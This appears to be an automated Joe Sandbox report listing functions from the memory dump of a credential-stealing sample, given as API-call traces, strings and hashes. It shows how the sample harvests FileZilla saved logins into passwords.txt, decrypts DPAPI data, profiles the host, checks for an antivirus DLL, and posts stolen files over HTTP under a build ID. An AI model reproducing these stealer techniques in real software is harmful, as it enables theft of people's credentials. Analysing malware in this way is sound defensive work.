Instruction ID: a3cdee16b5dfd04d3bd918c7eedd9f2c5ccf5c1b7225a83da59ac7103b0bc528
Opcode Fuzzy Hash: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
Instruction Fuzzy Hash: 81012170A01224DFDB60DB64DD45BDE77B9AF09311F4011E6E409E2290EB398B81CB25

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
Instruction ID: ba20de4f6d07cba688775156cda93bca6e715b227c052c7d3b8ee28496ea85f9
Opcode Fuzzy Hash: b5110414db0781ed465f941b9ae6bcaf1628d348266bcf15fae52e8b0fa6dca4
Instruction Fuzzy Hash: 2A314F71900328AFCB20EF65DD89BDEB3B8AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417F41,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
Instruction ID: a342571249a904de89e2d28a6ac51ba89f12813f8da7ed82e50d95a069ae9259
Opcode Fuzzy Hash: 3a25e308f3e13ec267530d7d1545f0ea3354c92615fb9149f05ae7eefacbcf4d
Instruction Fuzzy Hash: C1018135600224AFEB61DB609D48FEE77FE9F19301F8400E6E40DE2251EA798B849B35

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
Instruction ID: cecb0f06a50482290116f099c25e0230255ed02a1d9bcffe7551c72d2d14305d
Opcode Fuzzy Hash: d4b453576ad4f3625b6b8d3a98ae388fbddfe9144bcf6f2d6953d3127222c563
Instruction Fuzzy Hash: 9C117771A00214ABDB11EB65DC85BEE73A9AB48304F400097F905A3251DB78AEC48B64

Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
RtlAllocateHeap.NTDLL(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocateBinaryCryptProcessString
String ID:
API String ID: 869800140-0
Opcode ID: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction ID: cc1f0cdc7ec9addca40c1236ae1a006933468a7893b1c2cc3d15f31d1535d567
Opcode Fuzzy Hash: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction Fuzzy Hash: 3F010C70500309BFDF158FA1DC849AB7BBAFF493A5B248459F90593220E7369E91EA24

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
Instruction ID: 61d95923a291ecda6e095beb314f014951f64f3de92a0ce4f4bd39d2e0bf5c47
Opcode Fuzzy Hash: da3ab1333ae34f1d28e0fac43badc88ac46d6a3555cecf111c3774452892b3c3
Instruction Fuzzy Hash: F2F0E071A0132467EB04DFB4EC49B9B37659B04725F100295F511D71D0EB759E844785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418654), ref: 004014DF

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: RtlAllocateHeap.NTDLL(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,b99f23e6ab2693b305f8810abd671d18,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

", xrefs: 0040581B
", xrefs: 0040597B
b99f23e6ab2693b305f8810abd671d18, xrefs: 004059A7
", xrefs: 00405C35
block, xrefs: 00405E30
------, xrefs: 00405B5D
file_data, xrefs: 00405C09
------, xrefs: 0040573C
------, xrefs: 0040589D
--, xrefs: 00405600
------, xrefs: 004059FF
------, xrefs: 00405605
ERROR, xrefs: 00405D79
", xrefs: 00405AD8
build_id, xrefs: 0040594F
ERROR, xrefs: 00405F2F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$OpenRequestlstrcat$AllocAllocateBinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$ERROR$ERROR$b99f23e6ab2693b305f8810abd671d18$block$build_id$file_data
API String ID: 215681420-1533233811
Opcode ID: 35c61566c60d4d54ae4f038d4b709f28b1f5466e58086f1b9e98f1c11160a1dd
Instruction ID: 4baf88cb2a5c47609fe6293a48fe3edcdf17a13d7b96339157f3ca2814525fa3
Opcode Fuzzy Hash: 35c61566c60d4d54ae4f038d4b709f28b1f5466e58086f1b9e98f1c11160a1dd
Instruction Fuzzy Hash: 8F42E671D401699BDF21FB21DC45ADDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
Login: , xrefs: 0040E98C
<Pass encoding="base64">, xrefs: 0040E88A
Soft: FileZilla, xrefs: 0040E948
passwords.txt, xrefs: 0040EA4D
Host: , xrefs: 0040E954
<Port>, xrefs: 0040E818
<User>, xrefs: 0040E851
<Host>, xrefs: 0040E7D9
Password: , xrefs: 0040E9AE

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
